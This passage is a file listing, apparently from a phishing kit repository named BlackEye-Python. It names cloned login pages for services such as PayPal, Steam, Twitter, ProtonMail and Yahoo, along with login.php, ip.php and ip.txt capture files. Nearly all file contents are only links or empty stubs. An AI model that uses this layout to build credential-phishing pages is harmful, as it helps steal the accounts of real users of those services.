https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/EA_Origin_Lockup_Black.png -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/analytics.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/analytics.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/api.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/api.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/css.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/css.css -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/iframe_api.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/iframe_api.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/jquery-1.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/jquery-1.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/jquery.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/jquery.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/jquery_002.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/jquery_002.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/jquery_003.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/jquery_003.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/jquery_004.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/jquery_004.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/originX-pc-common.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/originX-pc-common.css -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/originX-pc-login.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/originX-pc-login.css -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/otk.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/otk.css -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/recaptcha__en.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/recaptcha__en.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/sha.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/sha.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/utag.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/utag.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/utag_002.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/utag_002.js -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/www-widgetapi.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/SIGN IN_files/www-widgetapi.js -------------------------------------------------------------------------------- /sites/origin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/origin/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/ip.php -------------------------------------------------------------------------------- /sites/origin/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/login.html -------------------------------------------------------------------------------- /sites/origin/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/origin/login.php -------------------------------------------------------------------------------- /sites/paypal/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/paypal/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/paypal/ip.php -------------------------------------------------------------------------------- /sites/paypal/ip.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /sites/paypal/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/paypal/login.html -------------------------------------------------------------------------------- /sites/paypal/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/paypal/login.php -------------------------------------------------------------------------------- /sites/pinterest/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/pinterest/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/ip.php -------------------------------------------------------------------------------- /sites/pinterest/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login.html -------------------------------------------------------------------------------- /sites/pinterest/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login.php -------------------------------------------------------------------------------- /sites/pinterest/login_files/130492214192672: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/130492214192672 -------------------------------------------------------------------------------- /sites/pinterest/login_files/cbgapi.loaded_0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/cbgapi.loaded_0 -------------------------------------------------------------------------------- /sites/pinterest/login_files/cbgapi.loaded_1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/cbgapi.loaded_1 -------------------------------------------------------------------------------- /sites/pinterest/login_files/cbgapi.loaded_2: -------------------------------------------------------------------------------- 1 | /* JS */ gapi.loaded_2(function(_){var window=this; 2 | }); 3 | // Google Inc. 4 | -------------------------------------------------------------------------------- /sites/pinterest/login_files/cbgapi.loaded_3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/cbgapi.loaded_3 -------------------------------------------------------------------------------- /sites/pinterest/login_files/clientplusone.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/clientplusone.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/common_desktop-cc5955b1658b3049a89a8e74824afa2e.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/common_desktop-cc5955b1658b3049a89a8e74824afa2e.css -------------------------------------------------------------------------------- /sites/pinterest/login_files/entryChunk-www-42ec251dd63eb28f1a3e87da28288e59.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/entryChunk-www-42ec251dd63eb28f1a3e87da28288e59.css -------------------------------------------------------------------------------- /sites/pinterest/login_files/entryChunk-www-unauth-a04e2ef9d883ee259f83.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/entryChunk-www-unauth-a04e2ef9d883ee259f83.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/fbevents.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/fbevents.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/gestalt-039ab764a920c98697f74f32bdf681a1.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/gestalt-039ab764a920c98697f74f32bdf681a1.css -------------------------------------------------------------------------------- /sites/pinterest/login_files/iframe.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/iframe.html -------------------------------------------------------------------------------- /sites/pinterest/login_files/iframe_data/3723580519-idpiframe.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/iframe_data/3723580519-idpiframe.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/login_button.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/login_button.html -------------------------------------------------------------------------------- /sites/pinterest/login_files/login_button_data/Z4_JZrbn7cR.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/login_button_data/Z4_JZrbn7cR.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/login_button_data/aMltqKRlCHD.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/login_button_data/aMltqKRlCHD.png -------------------------------------------------------------------------------- /sites/pinterest/login_files/pjs-0-5d015373385578e0d2c4.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/pjs-0-5d015373385578e0d2c4.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/pjs-22-c150d8ee52dea5f25e55.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/pjs-22-c150d8ee52dea5f25e55.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/pjs-231-02ef0f57734d26cb9029.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/pjs-231-02ef0f57734d26cb9029.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/pjs-49-388b2e3857b09960543d.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/pjs-49-388b2e3857b09960543d.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/pjs-51-02ea5c5c9fb36b662bcf.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/pjs-51-02ea5c5c9fb36b662bcf.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/pjs-locale-en_US-lite-3dcf38fa608036c641ca.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/pjs-locale-en_US-lite-3dcf38fa608036c641ca.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/postmessageRelay.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/postmessageRelay.html -------------------------------------------------------------------------------- /sites/pinterest/login_files/postmessageRelay_data/25936583-postmessagerelay.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/postmessageRelay_data/25936583-postmessagerelay.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/postmessageRelay_data/cbgapi.loaded_0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/postmessageRelay_data/cbgapi.loaded_0 -------------------------------------------------------------------------------- /sites/pinterest/login_files/postmessageRelay_data/rpcshindig_random.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/postmessageRelay_data/rpcshindig_random.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/sdk.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/sdk.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/sdk_002.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/sdk_002.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/sdk_003.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/sdk_003.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/signin.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/signin.html -------------------------------------------------------------------------------- /sites/pinterest/login_files/vendor-react-d20f99c48b5d58e4821c.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/vendor-react-d20f99c48b5d58e4821c.js -------------------------------------------------------------------------------- /sites/pinterest/login_files/xaOI6zd9HW9.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/pinterest/login_files/xaOI6zd9HW9.html -------------------------------------------------------------------------------- /sites/protonmail/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/protonmail/index_files/app.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/protonmail/index_files/app.js -------------------------------------------------------------------------------- /sites/protonmail/index_files/appLazy.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/protonmail/index_files/appLazy.js -------------------------------------------------------------------------------- /sites/protonmail/index_files/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/protonmail/index_files/logo.png -------------------------------------------------------------------------------- /sites/protonmail/index_files/openpgp.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/protonmail/index_files/openpgp.js -------------------------------------------------------------------------------- /sites/protonmail/index_files/styles.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/protonmail/index_files/styles.css -------------------------------------------------------------------------------- /sites/protonmail/index_files/vendor.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/protonmail/index_files/vendor.js -------------------------------------------------------------------------------- /sites/protonmail/index_files/vendorLazy.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/protonmail/index_files/vendorLazy.js -------------------------------------------------------------------------------- /sites/protonmail/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/protonmail/ip.php -------------------------------------------------------------------------------- /sites/protonmail/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/protonmail/login.html -------------------------------------------------------------------------------- /sites/protonmail/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/protonmail/login.php -------------------------------------------------------------------------------- /sites/shopify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/shopify/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/shopify/ip.php -------------------------------------------------------------------------------- /sites/shopify/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/shopify/login.html -------------------------------------------------------------------------------- /sites/shopify/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/shopify/login.php -------------------------------------------------------------------------------- /sites/shopping/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/shopping/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/shopping/ip.php -------------------------------------------------------------------------------- /sites/shopping/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/shopping/login.html -------------------------------------------------------------------------------- /sites/shopping/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/shopping/login.php -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/images/favicon/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/images/favicon/favicon.png -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/images/ghost/ghost.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/images/ghost/ghost.svg -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/scripts/dropdown.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/scripts/dropdown.min.js -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/scripts/jquery.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/scripts/jquery.min.js -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/scripts/main.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/scripts/main.js -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/scripts/semantic.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/scripts/semantic.min.js -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/accounts.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/accounts.css -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/auth.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/auth.css -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/dropdown.min.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/dropdown.min.css -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/revoke.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/revoke.css -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/semantic.min.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/semantic.min.css -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/snapchat.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/snapchat.css -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons-.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons-.eot -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons.eot -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons.svg -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons.ttf -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons.woff -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/themes/default/assets/fonts/icons.woff2 -------------------------------------------------------------------------------- /sites/snapchat/accounts/static/styles/themes/default/assets/images/flags.png.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/accounts/static/styles/themes/default/assets/images/flags.png.html -------------------------------------------------------------------------------- /sites/snapchat/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/favicon.ico -------------------------------------------------------------------------------- /sites/snapchat/ghost.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/ghost.svg -------------------------------------------------------------------------------- /sites/snapchat/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/snapchat/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/ip.php -------------------------------------------------------------------------------- /sites/snapchat/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/login.html -------------------------------------------------------------------------------- /sites/snapchat/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/snapchat/login.php -------------------------------------------------------------------------------- /sites/spotify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/spotify/index_files/analytics.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/index_files/analytics.js -------------------------------------------------------------------------------- /sites/spotify/index_files/anchor.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/index_files/anchor.html -------------------------------------------------------------------------------- /sites/spotify/index_files/api.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/index_files/api.js -------------------------------------------------------------------------------- /sites/spotify/index_files/bframe.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/index_files/bframe.html -------------------------------------------------------------------------------- /sites/spotify/index_files/bframe_data/hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/index_files/bframe_data/hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js -------------------------------------------------------------------------------- /sites/spotify/index_files/bframe_data/styles__ltr.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/index_files/bframe_data/styles__ltr.css -------------------------------------------------------------------------------- /sites/spotify/index_files/index.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/index_files/index.css -------------------------------------------------------------------------------- /sites/spotify/index_files/index.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/index_files/index.js -------------------------------------------------------------------------------- /sites/spotify/index_files/recaptcha__en.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/index_files/recaptcha__en.js -------------------------------------------------------------------------------- /sites/spotify/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/ip.php -------------------------------------------------------------------------------- /sites/spotify/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/login.html -------------------------------------------------------------------------------- /sites/spotify/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/spotify/login.php -------------------------------------------------------------------------------- /sites/steam/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/steam/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/steam/ip.php -------------------------------------------------------------------------------- /sites/steam/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/steam/login.html -------------------------------------------------------------------------------- /sites/steam/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/steam/login.php -------------------------------------------------------------------------------- /sites/twitch/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/twitch/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/twitch/ip.php -------------------------------------------------------------------------------- /sites/twitch/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/twitch/login.html -------------------------------------------------------------------------------- /sites/twitch/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/twitch/login.php -------------------------------------------------------------------------------- /sites/twitter/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/twitter/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/twitter/ip.php -------------------------------------------------------------------------------- /sites/twitter/ip.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /sites/twitter/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/twitter/login.html -------------------------------------------------------------------------------- /sites/twitter/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/twitter/login.php -------------------------------------------------------------------------------- /sites/twitter/usernames.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/twitter/usernames.txt -------------------------------------------------------------------------------- /sites/verizon/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/verizon/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/verizon/ip.php -------------------------------------------------------------------------------- /sites/verizon/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/verizon/login.html -------------------------------------------------------------------------------- /sites/verizon/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/verizon/login.php -------------------------------------------------------------------------------- /sites/vk/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/vk/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/vk/ip.php -------------------------------------------------------------------------------- /sites/vk/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/vk/login.html -------------------------------------------------------------------------------- /sites/vk/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/vk/login.php -------------------------------------------------------------------------------- /sites/wordpress/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/wordpress/index_files/images/wordpress-logo.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/wordpress/index_files/images/wordpress-logo.svg -------------------------------------------------------------------------------- /sites/wordpress/index_files/load-styles.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/wordpress/index_files/load-styles.css -------------------------------------------------------------------------------- /sites/wordpress/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/wordpress/ip.php -------------------------------------------------------------------------------- /sites/wordpress/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/wordpress/login.html -------------------------------------------------------------------------------- /sites/wordpress/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/wordpress/login.php -------------------------------------------------------------------------------- /sites/yahoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yahoo/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/yahoo/ip.php -------------------------------------------------------------------------------- /sites/yahoo/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/yahoo/login.html -------------------------------------------------------------------------------- /sites/yahoo/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/yahoo/login.php -------------------------------------------------------------------------------- /sites/yahoo/yahoo_files/boot.js: -------------------------------------------------------------------------------- 